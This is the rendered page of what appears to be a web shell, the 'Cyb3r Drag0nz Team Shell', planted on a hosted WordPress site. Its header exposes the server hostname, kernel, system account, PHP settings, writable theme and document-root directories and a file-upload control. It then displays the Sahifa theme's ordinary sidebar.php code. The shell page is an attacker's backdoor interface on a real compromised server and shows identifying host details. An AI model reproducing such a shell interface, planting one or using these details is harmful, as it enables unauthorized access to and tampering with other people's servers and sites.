Google

Cyb3r Drag0nz Team Shell

Server : Apache
System : Linux webd003.cluster126.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
User : atwiofrxug (73666)
PHP Version : 8.4.10
Disable Functions : _dyuweyrj4,_dyuweyrj4r,dl
Current Directory : /home/atwiofrxug/mylittletelaviv/wp-content/themes/sahifa/
Directory Status: Writeable | Document Root: Writeable

Upload File







Viewing: /home/atwiofrxug/mylittletelaviv/wp-content/themes/sahifa/sidebar.php

<aside id="sidebar">
	<div class="theiaStickySidebar">
<?php
	wp_reset_query();
	
	$tie_sidebar_pos = $tie_sidebar_post = '';
	
	if ( is_home() ){
	
		$sidebar_home = tie_get_option( 'sidebar_home' );
		if( !empty( $sidebar_home ) )
			dynamic_sidebar ( sanitize_title( $sidebar_home ) ); 
			
		else dynamic_sidebar( 'primary-widget-area' );	
		
	}elseif ( function_exists('is_bbpress') && is_bbpress() ){
	
		if( !tie_get_option( 'bbpress_full' ) ){
			$sidebar_bbpress = tie_get_option( 'sidebar_bbpress' );
			if( !empty( $sidebar_bbpress ) )
				dynamic_sidebar ( sanitize_title( $sidebar_bbpress ) ); 
				
			else dynamic_sidebar( 'primary-widget-area' );
		}
		
	}elseif( is_page() || ( function_exists('bp_current_component') && bp_current_component() ) ){
		global $get_meta;
		
		if( !empty( $get_meta["tie_sidebar_pos"][0] ) )
			$tie_sidebar_pos = $get_meta["tie_sidebar_pos"][0];

		if( $tie_sidebar_pos != 'full' ){
		
			if( !empty( $get_meta["tie_sidebar_post"][0] ) )
				$tie_sidebar_post = sanitize_title($get_meta["tie_sidebar_post"][0]);
				
			$sidebar_page = tie_get_option( 'sidebar_page' );
			if( !empty( $tie_sidebar_post ) )
				dynamic_sidebar($tie_sidebar_post);
				
			elseif( $sidebar_page )
				dynamic_sidebar ( sanitize_title( $sidebar_page ) ); 
			
			else dynamic_sidebar( 'primary-widget-area' );
		}

	}elseif ( is_single() ){
		global $get_meta;
		
		if( !empty( $get_meta["tie_sidebar_pos"][0] ) )
			$tie_sidebar_pos = $get_meta["tie_sidebar_pos"][0];

		if( $tie_sidebar_pos != 'full' ){
		
			if( !empty( $get_meta["tie_sidebar_post"][0] ) )
				$tie_sidebar_post = sanitize_title($get_meta["tie_sidebar_post"][0]);
				
			$sidebar_post = tie_get_option( 'sidebar_post' );
			if( !empty( $tie_sidebar_post ) )
				dynamic_sidebar($tie_sidebar_post);
				
			elseif( $sidebar_post )
				dynamic_sidebar ( sanitize_title( $sidebar_post ) ); 
			
			else dynamic_sidebar( 'primary-widget-area' );
		}
		
	}elseif ( is_category() ){
		
		$category_id = get_query_var('cat') ;
		$tie_cats_options = get_option( 'tie_cats_options' );
		if( !empty( $tie_cats_options[ $category_id ] ) )
			$cat_options = $tie_cats_options[ $category_id ];

		if( !empty($cat_options['cat_sidebar']) )
			$cat_sidebar = $cat_options['cat_sidebar'];
			
		$sidebar_archive = tie_get_option( 'sidebar_archive' );

		if( !empty( $cat_sidebar ) )
			dynamic_sidebar ( sanitize_title( $cat_sidebar ) ); 
			
		elseif( $sidebar_archive )
			dynamic_sidebar ( sanitize_title( $sidebar_archive ) );
			
		else dynamic_sidebar( 'primary-widget-area' );
		
	}else{
		$sidebar_archive = tie_get_option( 'sidebar_archive' );
		if( !empty( $sidebar_archive ) ){
			dynamic_sidebar ( sanitize_title( $sidebar_archive ) );
		}
		else dynamic_sidebar( 'primary-widget-area' );
	}
?>
	</div><!-- .theiaStickySidebar /-->
</aside><!-- #sidebar /-->

Cyb3r Drag0nz Team • Google Edition